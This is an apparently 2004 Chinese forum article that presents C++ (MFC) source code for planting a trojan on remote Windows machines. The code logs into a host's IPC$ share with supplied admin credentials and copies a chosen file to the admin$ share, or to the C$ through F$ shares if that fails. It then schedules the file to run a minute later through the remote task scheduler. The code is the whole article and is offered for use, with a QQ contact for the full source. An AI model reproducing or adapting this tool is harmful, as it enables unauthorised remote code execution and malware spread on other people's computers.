VC++多线远程IPC程种植木马
/ns/wz/comp/data/20040616223014.htm
主要实现代码如下/////////////////////////////////////////////////////////////////////////////////////
typedef struct TagHost
{
CString host;
CString user;
CString pass;
CString filename;
CString LocalFilePath;
CListBox* list;
}IPC;
void CShareDlg::OnStart() 启动线程序
{
UpdateData(TRUE);
IPC* ipc = new IPC;
ipc->host = m_host;
ipc->user = m_user;
ipc->pass = m_pass;
ipc->LocalFilePath = m_localfile;
ipc->filename = filename;
ipc->list = &m_list;
AfxBeginThread(ThreadIpcConnect,ipc);
}
线程/////////////////////////////////////////////////////////////////////////////////////////////////
UINT ThreadIpcConnect(LPVOID lpvoid)
{
IPC* ipc;
CListBox* list;
ipc = (IPC*)lpvoid;
CString host;
CString admin;
CString pass;
CString filename;
CString localfilepath;
host = ipc->host ;
pass = ipc->pass;
admin = ipc->user;
localfilepath = ipc->LocalFilePath;
filename =ipc->filename ;
list = ipc->list;
BOOL IpcConnect;
LPTIME_OF_DAY_INFO TimeBuf=NULL;
NET_API_STATUS Status;
CString RemoteFilePath,CmdCom("admin$\\");
///////////////////////////////IPC连接////////////////////////////////////////////////////////////////
NETRESOURCE ns;
TCHAR buf[MAX_PATH];
wsprintf(buf,"\\\\%s\\ipc$",host);
ZeroMemory(&ns,sizeof(ns));
ns.dwScope=RESOURCE_GLOBALNET;
ns.dwType=RESOURCETYPE_ANY;
ns.dwDisplayType=RESOURCEDISPLAYTYPE_GENERIC;
ns.dwUsage=RESOURCEUSAGE_CONNECTABLE;
ns.lpLocalName="";
ns.lpRemoteName=buf;
ns.lpProvider=NULL;
ns.lpComment=NULL;
CString hhost = host;
IpcConnect =WNetAddConnection2(&ns,pass,admin,0);
///建立IPC连接
if(IpcConnect)
{
//连接成功后
///////////////////////////连接成功上传文件//////////////////////////////////////////////////////////
RemoteFilePath=("\\\\"+host+"\\admin$\\"+filename);
IpcConnect=CopyFile(localfilepath,RemoteFilePath,FALSE);
//复制文件到admin$(winnt) 如果复制失败,,向其他共享区复制
if(!IpcConnect)
{
RemoteFilePath=("\\\\"+host+"\\C$\\"+filename);
CmdCom="C:\\"+filename;
IpcConnect=CopyFile(localfilepath,RemoteFilePath,FALSE);
if(!IpcConnect)
{
RemoteFilePath=("\\\\"+host+"\\D$\\"+filename);
CmdCom="D:\\"+filename;
IpcConnect=CopyFile(localfilepath,RemoteFilePath,FALSE);
if(!IpcConnect)
{
RemoteFilePath=("\\\\"+host+"\\E$\\"+filename);
CmdCom="E:\\"+filename;
IpcConnect=CopyFile(localfilepath,RemoteFilePath,FALSE);
if(!IpcConnect)
{
RemoteFilePath ("\\\\"+host+"\\F$\\"+filename);
CmdCom = "F:\\"+filename;
IpcConnect = CopyFile(localfilepath,RemoteFilePath,FALSE);
}
}
}
}
///////////////////////////得到远程主机时间///////////////////////////////////////////////////////////
if(IpcConnect)
{//获取远程主机时间
Status=NetRemoteTOD(host.AllocSysString(),(LPBYTE *)&TimeBuf);
if(Status==NERR_Success)
{//活取时间成功
///////////////////////////启动目标文件///////////////////////////////////////////////////////////////
DWORD day=1,JobTime;
AT_INFO ai;
day=day*2;
ai.Command=CmdCom.AllocSysString();
ai.DaysOfMonth=day;
ai.DaysOfWeek=0;
ai.Flags=JOB_NONINTERACTIVE;
ai.JobTime=((TimeBuf->tod_hours+(-TimeBuf->tod_timezone)/60)%24)*60*60*1000+(TimeBuf->tod_mins+1)*60*1000;
Status=NetScheduleJobAdd(hhost.AllocSysString(),(LPBYTE)&ai,&JobTime);
//启动上传的文件,一分钟后启动
if(Status==NERR_Success)
{
list->AddString(host+"启动成功");
}
else
list->AddString(host+"启动失败");
}
else
{
list->AddString(host+"获取时间失败");
}
}
else
{
list->AddString(host+"复制文件失败");
}
}
else
list->AddString(host+"连接失败");
return TRUE;
}
欢迎大家可以找我一起学习,QQ:27272855;如果大家要源代码,来找我,我没空间,所以没。。。。。。。。。
=========================
文章类型:转载 提交:特务 核查:NetDemon